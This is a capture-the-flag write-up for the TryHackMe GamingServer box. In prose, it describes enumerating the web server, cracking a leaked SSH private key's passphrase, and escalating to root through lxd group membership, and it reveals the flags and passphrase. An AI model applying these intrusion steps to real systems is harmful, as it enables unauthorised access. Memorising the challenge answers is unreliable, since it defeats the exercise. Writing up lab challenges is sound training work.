TryHackMe: GamingServer is an easy boot2root challenge on TryHackMe. This challenge simulates a “gaming server built by amateurs with no experience in web development.” With an exposed RSA Private Key, we can gain a foothold onto the server and take advantage of lxd, a development system, to escalate privileges to root.
Information Gathering
As always, to start the information gathering phase of this challenge, we will use Nmap to scan all ports at the GamingServer’s IP address.
On this Ubuntu Linux machine, 2 out of the 65535 ports are open. Port 22 is running SSH version OpenSSH 7.6p1 and port 80 is running Apache 2.4.29. By going to this IP address in our browser, we can see that the apache web server is hosting a website called Draagan.
It looks like the gaming server’s website is still under construction.
Going to the browser’s source code, we can see that the developers left a comment for John. We can conclude that John is the user account we should be targeting during this assessment.
The overall functionality of this website is limited and does not give us an ample foothold onto the server. Therefore, another directory will give us the information we need to gain access to this machine.
Using a tool like Gobuster, we can enumerate the directories and files on the webserver. The results above show that the /uploads and /secret directories could hold valuable information.
Unless you want to read the hacker manifesto by The Mentor or look at a picture of a shocked Beaker from the Muppets, there isn’t any particular value from the manifesto.txt or meme.jpg files. However, the file of interest is the dict.lst file a dictionary list that contains common passwords.
The /secret directory only has one file named secretKey. The secretKey refers to an RSA Private Key which can be used to authenticate SSH access.
Exploitation
To start, we will copy the RSA private key into a file called id_rsa and permit it 600. Then will use the tool ssh2john.py to convert the id_rsa file into a format that John the Ripper will be able to crack. Finally, using the dict.lst we copied from the /uploads directory, we can then crack the RSA Private Key passphrase.
After a couple of minutes, the RSA Private Key passphrase has been cracked, and the passphrase is letmein.
Using the private key file, id_rsa, we can then use the id_rsa file to ssh into the machine as John. That’s where we can find the user.txt flag a5c2ff8b9c2e3d4fe9d4ff2f1a5a6e7e.
Post Exploitation
The last thing we need to do to complete this challenge is escalating our privileges to root and find the root.txt flag.
Unlike other privilege escalation challenges, the sudo -l command does not bear much information because we do not have john’s password.
However, we can upload a tool called linpeas.sh onto the server to search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. LinPEAS, Linux Privilege Escalation Awesome Script, is a great tool to automate the privilege escalation process.
As the legend states, anything with a highlighted RED/YELLOW text indicates it is 95% a Privilege escalation vector. LXD, highlighted above, is an open-source container management extension for Linux Containers (LXC).
The LinPeas README file states that all of LinPeas’ checks are explained in book.hacktricks.xyz. This website has instructions on how to escalate our privileges to root because we are a part of lxd/lxc group.
Run the first block of commands on your host machine and then upload it to the victim server.
After uploading the lxd.tar.xz and rootfs.squashfs file, we add the image, create a container and add root path, and finally execute the container to become root.
The last thing to do is to find the root.txt flag.
It took some time but the root directory was accessible in the /mnt directory. Revealing that the root.txt flag is 2e337b8c9f3aff0c2b3e8d4e6a7c88fc.
Conclusion
In conclusion, this challenge was really fun and seemed more realistic than previous challenges. People upload their RSA private keys in directories they think people won’t find all the time. Like I said above, it took some time to find the root flag but it was better than just rushing over to the /root directory and finding it there.
